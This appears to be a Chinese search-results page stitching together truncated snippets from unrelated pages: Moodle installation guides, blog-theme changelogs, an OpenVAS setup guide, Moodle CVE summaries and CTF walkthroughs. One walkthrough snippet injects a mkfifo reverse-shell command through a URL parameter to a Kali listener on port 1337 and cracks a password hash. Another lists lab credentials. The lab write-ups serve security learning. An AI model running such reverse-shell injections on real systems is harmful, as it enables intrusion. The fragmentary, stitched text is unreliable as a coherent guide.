chrome页面效果如下:油猴控制台如下:油猴脚本内容如下:// ==UserScript==// @name Display Current Time in Top Center//...function() { 'use strict'; // 获取当前时间并格式化为字符串 var currentTime = new Date().toLocaleTimeString(); // 获取页面元素...pageElement.innerHTML = currentTime; pageElement.style.zIndex = '9999'; // 设置z-index为9999以确保它在其他元素之上 // 将时间插入到页面顶部居中位置
登录后,您将看到mysql>提示。...现在我们可以在浏览器中启动Moodle并继续在那里进行设置。 第三步 - 在浏览器中配置Moodle 要完成Moodle的配置,我们将在Web浏览器中显示该站点,并为其提供一些其他配置详细信息。...查看“ 服务器检查”页面是否存在任何可能的问题,确保底部存在“您的服务器环境满足所有最低要求”消息,然后按继续。 Moodle将安装几个组件,为每个组件显示“成功”消息。滚动到底部,然后按继续。...在“ 首页设置”屏幕上,填写“ 完整站点名称”,“ 站点的短名称”,设置位置,然后选择是否允许通过电子邮件进行自行注册。然后单击保存更改。 一旦你完成了这个。...当您单击主题名称下的使用主题按钮时,您的Moodle网站将使用该主题显示您网站的所有内容。您还可以为平板电脑或手机等不同设备选择不同的主题。
我最喜欢的安装方法是从 Turnkey Linux 下载并制作 ISO,然后在 VirtualBox 中安装 Moodle 网站。 首先,下载 Moodle ISO 保存到电脑中。...开始使用 Moodle 现在你可以登录到 Moodle 机器并熟悉该软件了。使用默认的用户名 admin 和创建 Moodle VM 时设置的密码登录 Moodle。...image.png 首次登录后,你将看到初始的 Moodle 网站的主仪表盘。...要使你的 Moodle 网站个性化,请在用户界面左侧的菜单中,选择“站点首页Site home”。...image.png 你可以根据需要更改站点名称,并添加简短名称和站点描述。 image.png
Moodle是一款优秀的开源 LMS(在线学习管理平台),在全球广泛的应用在各级学校和单位,用作慕课系统,开展线上知识学习与管理。...据 维基百科 2010年1月统计,全球使用 Moodle 系统搭建有45,721个已注册及查核的网站,为3200万位用户提供约300万个课程。...镜像,一键开机,通过 http://IP 访问 Moodle 系统,经过简单的配置就可以登录Moodel进行业务操作。...[img] 系统管理 登录进入系统,选择网站管理进行系统管理、用户管理及课程管理等。...要快速部署Moodle可以使用Websoft9的镜像,在各大公有云云市场均有发布。去腾讯云找Moodle。
一个静态的网页,还有一些其他的页面,Courses,Students等等 检查下网页的源代码,在GALLERY页面发现一个奇怪的点 ?...第一个img元素多了一个onerror错误事件,意思是加载错误时在控制台输出(That‘s an F) ? 然后其他的img图片都是能正常打开唯独第一个是无法打开的 ?.../moodle ? PhpMyAdmin被拦截无法访问,然后moodle是正常可以访问的 Moddle有个登陆页面 ?...如果能正常显示说明payload没有问题 我们用kali监听1337 然后在页面后面添加如下url并访问 &sdfz=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin...也可以到这个网站破解:https://crackstation.net/ ? 帐户:Giovannibak(这个帐户其实是不对的) 密码:expelled 然后我们切换过去 ?
0x00 前言 Moodle是一个开源课程管理系统(CMS),也被称为学习管理系统(LMS)或虚拟学习环境(VLE)。它已成为深受世界各地教育工作者喜爱的一种为学生建立网上动态网站的工具。...Moodle 平台界面简单、精巧。使用者可以根据需要随时调整界面,增减内容。课程列表显示了服务器上每门课程的描述,包括是否允许访客使用,访问者可以对课程进行分类和搜索,按自己的需要学习课程。...0x01 漏洞描述 在被错误配置为允许访问其他用户的内容的共享托管环境中,同样可以直接访问Moodle webroot之外的网络服务器的Moodle用户可以利用本地文件include来实现远程代码执行。...0x02 CVE编号 CVE-2023-5539 在“课程”活动中发现了远程代码执行风险。默认情况下,这只适用于教师和管理人员。 CVE-2023-5540 IMSCP活动中发现了远程代码执行风险。...CVE-2023-5550 在被错误配置为允许访问其他用户的内容的共享托管环境中,同样可以直接访问Moodle webroot之外的网络服务器的Moodle用户可以利用本地文件include来实现远程代码执行
我们要完成网站搭建,必须要有服务器、要完成网站部署、域名注册及域名解析等事项,恰好这一切都可以在腾讯云上一站式完成,省心又省力。 服务器硬件配置复杂、种类繁多很难选择?价格高要下血本?...,记得需要重置下密码: [点击打开实例名称] [点击右上角“重置密码”,根据提示完成重置] 密码重置完成后,就可以登录服务器啦~~ 二、moddle下载及安装--2分钟 2.1 moddle...作为一款非常优秀的在线学习网站模板广受好评,我们可以直接去moddle官网上下周最新稳定版本,下载链接:https://download.moodle.org/releases/latest/ [f1j99afssm.png...文件夹整体移动到网站根目录下/home/www/htdocs (mv ....这里可以写云数据库IP地址,注意此处的用户名为root,密码根据 服务器管理台提示获取, 填下相关信息后继续next: image.png image.png 信息确认,此处要根据提示在moodle
由于“在配置数据库会话处理程序时过度使用 PHP 的session_decode函数”,未经身份验证的缺陷 (CVE-2021-40691) 存在于 Moodle 的 Shibboleth 身份管理插件...该错误取决于Moodle 中启用的Shibboleth身份验证。...研究人员说,这解码了数据库的序列化会话数据,并用解码的数据填充了$_SESSION超全局变量——将攻击者作为每个用户在几分之一秒内都具有活动会话的登录。...由于session_decode,该会话被分配给攻击者的会话 cookie ,因此攻击者可以刷新页面并劫持随机用户会话。...他们于 2 月 21 日通过 Bugcrowd 提交了该错误,并 于 9 月 12 日在GitHub上发布了一个补丁。
主题自带文字LOGO,开启之后在 网站设置-网站标题 处设置相关文字logo,建议不超过6个字。 开启二级菜单代码:开启链接管理插件可以忽略此段。...-- 新增网站关闭状态页面友好提示,背景图设置调用登录图片接口。 -- 优化用户体验,提高页面加载速度。 -- 按照谷歌PageSpeed页面优化相关代码。...-- 优化移动端侧栏菜单显示效果。 -- 优化用户体验,提高页面加载速度。 -- 修复主题设置右侧设置说明及css样式表网址错误的问题。...-- 优化文章详情页SEO标题设置,自选是否带有分类名称显示。 -- 优化侧栏显示效果,侧栏新增返回列表页和联系我们模块。...-- 修复最新动态资讯模块,文章列表顶部角标在移动端错位的问题。
2、挖掘HTTP服务 访问:http://192.168.4.202,显示的文本提示了一条线索,它说进入到/sev-home/目录中。...这时候来到http主页查看源码: 3、挖掘JS信息 在http://192.168.4.202/页面查看源代码: 访问:view-source...打开后在Decoder处进行HTML破解获取 最终账号密码:boris/InvincibleHack3r 5、信息页面枚举 通过前面的两个用户名一次尝试破解的HTML密码信息,获得了正确的用户名密码登录...还是linux环境下都是存在的,作用是将IP地址指向域名后,在本地访问域名会调转回IP地址信息可正常访问页面。...7、使用新的账户密码登录CMS 登录doak获得的用户名密码信息后在:Home / ▶ My home 右边发现:s3cret.txt文本信息,下载查看: 另外发现这是Moodle使用的2.2.3
购买并下载主题之后,登录网站后台,主题管理,上传刚才下载好的主题,然后点击启用,一般会提示“未登录客户端”或者“授权文件非法”等界面,这时,参考此教程:zblog开启主题或插件显示“授权文件非法”的解决办法...-- 新增网站关闭状态页面友好提示,背景图设置调用登录图片接口。 -- 优化分类模板排序功能在某些情况下提示函数错误的问题。 -- 继续优化谷歌PageSpeed页面相关代码。...V 1.5(22/09/30) -- 优化右侧顶部登录接口。 -- 优化因域名问题导致授权验证失效的问题。 -- 优化页面重构代码及自适应显示代码。 -- 优化部分用户中心代码兼容问题。...V 1.4.9(22/09/20) -- 优化顶部登录和注册接口调用错误的BUG。 -- 优化部分用户中心代码兼容问题。...-- 修复首页侧栏作者信息模块未登录状态地址错误的bug。 -- 修复标签页面无法排序的问题,排序仅在分类页面展示。 -- 修复关闭首页tab导航后侧栏随机文章点击换一换无效的BUG。
如果不喜欢现在的,可以把图片删除,更换自己的,添加自定义表情图标,表情名称不能只中文。 V、优化夜间模式显示效果。 V、顶部导航背景图固定模式。...---、删除商品页面banner顶部信息接口,直接调用该分类名称及SEO描述,背景图调用第一篇文章的第一张图片(选取图片逻辑跟列表统一) ---、修改商品模板排列样式(更新之后需要强制刷新Ctrl+F5...--、完善侧栏显示信息,如果用户登录网站,侧栏则显示用户信息,未登录时显示网站管理信息。 --、新增用户编辑接口,QQ、微信,用户可自定义。 --、修复文章有序列表代码。...--、移动端导航菜单新增会员登录功能,登录链接设置为(主题配置---基本配置---顶部登录功能--会员登录/注册链接) --、修复文章归档样式错乱的BUG(方法如下) 页面管理,新建页面,填写文章标题...哦对了,顶部登录更改了,变成在导航栏,这样简洁而且很好看。
您应该被代理到GSA登录页面。 在大多数浏览器中,您将首先遇到安全警告。发生这种情况是因为OpenVAS在安装时生成自签名SSL证书,并且您的主机未被识别为受信任的证书颁发机构。...要在Firefox中验证证书: 单击浏览器中警告页面上的“高级”按钮。 将显示其他详细信息,包括错误代码,类似于SEC_ERROR_UNKNOWN_ISSUER。单击错误代码以查看更多信息。...您看到的下一页将是Greenbone Security Assistant的登录页面,这是OpenVAS管理器的图形Web界面。页面出现在屏幕上后,输入admin用户的凭据并单击“登录”。...在扫描过程中,可以随时访问显示任务结果的报告。扫描完成所需的时间取决于主机上运行的服务,并且可能会有很大差异。要查看扫描结果,请选择顶部导航栏中的“扫描管理”,然后单击“报告”。...在我们的示例中,有33个: “结果”页面将列出扫描中发现的潜在漏洞。 要对它们进行排序,请单击页面顶部任何列的标题。
步骤2:搭建 PHP 网站 创建虚拟主机:在实例的管理页面,找到待验证的云服务器实例,并记录该云服务器实例的公网 IP。...http://云服务器实例的公网 IP:8888 显示结果如下图所示: image.png 输入如下信息并单击【登录】。 管理员帐号:默认 admin。 管理员密码:默认 cldera.com。...如下图所示: image.png 在 AMFTP 登录页面上,填写 步骤4 中已创建的 FTP 账号信息,并单击【登录】。如下图所示: image.png 准备 PHP 网站文件。...如下图所示: image.png 在“参数配置”页面,输入在 创建数据库 中已创建的数据库配置,并单击页面下方的【继续】。如下图所示: image.png 安装完成后,单击【访问网站首页】。...如下图所示: image.png 显示结果如下,成功进入网站首页。 image.png
V、精简代码,提升网站打开速度! 2020/05/03 V、优化侧栏留言头像间距。 2020/04/22 V、新增滚动条顶部显示位置百分比。 V、优化移动端自适应显示效果。...V、增加其他模板顶部背景图接口。 顶部背景图在主题设置开启,不同分类模板可以设置不同背景,新增的接口就是除了分类模板之外的页面,例如:标签页、用户页和搜索页等等,调用这个接口。...然后顶部的QQ登录可以根据实际需求而定,需要插件来实现,安装免费的QQ登录插件,按照插件教程设置,然后将登录地址添加进去,保存就行了。...最后就是网站底部的设置了,只需要修改下年份和网站名称就行,其他不需要设置,也不需要修改。...然后在看看首页设置: 需要你修改“底部导航标签”,直接替换名称和链接就行,比如网站地图,免责声明,关于我们等。在把网站的备案号修改成自己的,公安部没有备案的话,删除留空即可。
V、优化各模板标签名称。 主题更新日志:2020/07/16 V、文章列表新增视频显示功能,增加后台接口。 文章编辑,添加自定义视频和视频封面图,为空则不显示视频。...新增独立文章页面广告接口,感谢网友反馈。 修复模板两处接口调用错误的BUG。 主题更新日志:(2020/05/06) 优化赞赏移动端自适应显示效果。...在开启Pjax情况下,评论“加粗、倾斜、下划线”功能失效,如果你的插件较多、较杂不建议开启。 PS:Pjax对收录不是很友好,大型网站慎用。...主题更新日志:(10/15) 优化关闭顶部导航搜索太短的问题。 修复文章转载网址无效的BUG。 优化css样式表。 主题更新日志:(10/14) 修复顶部登录开关无效的BUG。...在这里说下,顶部登录偶尔点击无效,原因是为了自适应,所以在没有下拉菜单的情况下直接屏蔽了a链接,换句话说就是得开启QQ登录,开启之后才会有下拉菜单,这时移动端点击登录才能正常显示,整理用户体验不是特别好
修复搜索、分类、标签等文章列表中 “找到 * 篇与 的结果” 中 不显示的错误 修复移动端侧边栏图片封面右边多出的白色边框 修复友链页面站点介绍过多导致卡片高度不一的BUG 修复自定义多级分类的情况下网站地图生成...,Test修改为空 去除压缩包内多余文件 移动端情况下侧边栏头像优化为圆形 新增移动端可设置侧边栏壁纸显示模式为半屏或全屏 新增可自定义侧边栏登录注册URL函数 优化移动端当页面已经往下滑动之后点击分类等栏目不会返回顶部...1.11 新增可设置文章页面顶部大图背景壁纸 新增文章页可无限插入广告 兼容PHP7.3 - 8.0 修复登录页面提示登录成功但实际没有登录的BUG 修复登录注册等页面的字体样式不跟随站点样式的BUG...可配合壁纸高度功能使用全屏壁纸 新增可开启或关闭PC端导航栏背景毛玻璃效果(毛玻璃效果启动后部分PC端浏览页面可能会产生卡顿) 修复网站https协议情况时在主题设置处检测更新失败的BUG 新增文章页可开启顶部大图背景使用文章缩略图...-- 的BUG 新增可开启页面顶部位置展示屏幕浏览进度条 新增可开启页面底部位置展示灵动的鱼群跳跃,增添网站灵动气氛 优化文章导读目录点击后的处理流程 采用描点拦截无感滚动定位技术 优化首页推荐文章的推荐卡片显示位置
购买并下载主题之后,登录网站后台,主题管理,上传刚才下载好的主题,然后点击启用,一般会提示“未登录客户端”或者“授权文件非法”等界面,这时,参考此教程:zblog开启主题或插件显示“授权文件非法”的解决办法...-- 新增网站关闭状态页面友好提示,背景图设置调用登录图片接口。 -- 优化用户体验,提高页面加载速度。 -- 优化分类模板排序功能在某些情况下提示函数错误的问题。...-- 新增后台登录界面优化,功能设置,登录界面开启。 V 2.2.9(22/06/13) -- 修复模板vip页面售价调用函数错误的问题。 -- 优化主题主题页面模板的og标准化标签。...-- 修复单页模板在部分没有评论的情况下主题布局没有对齐的问题。 2021/03/13 -- 优化网站PHP代码,删除部分api接口。 -- 删除文章页顶部标题链接代码。...-- 新增网站Pjax功能。 -- 完善网站404错误页模板。 -- 优化icon图标代码,由奥森改为阿里图标库。
主题介绍 演示站点:https://www.itwuo.net/ 外观展示 移动端展示 首页: 产品展示页面: 产品订购页面: 登录页面: 注册页面: 邮箱找回密码页面:...V6.2 【优化】 优化了每次更新覆盖弹窗文件结构 优化了首页卡片图片与文字对称 优化去除用户logo排版 优化了首页文字排版 优化了首页标签 【修复】 修复服务器购买页面标识错误 修复电脑端登录首页导航用户名称颜色不对...网站底部排版颜色显示错误 【新增】 暂无新增项目 V6.0 【优化】 采用全新图标样式 优化海外机器加载缓慢 去除全站loading预加载极致体验 优化加载资源采用多节点cdn加载 优化主题首页底部颜色和版权网站信息排版优化...修复手机QQ QQ浏览器 网站底部排版颜色显示错误 【新增】 一键安装模块 一键升级模块 新增后台更新页面 新增图片懒加载优化体验 新增 Font Awesome 5 图标库 V5.62 1.更新注册防刷验证码不分大小写输入验证...) V5.13 1.修复部分资源云端加载失败 2.适配 VPS HOST 自定义内容 CDN上个版本更新过 3.首次在移动端加入轮播图片样式
领取专属 10元无门槛券
手把手带您无忧上云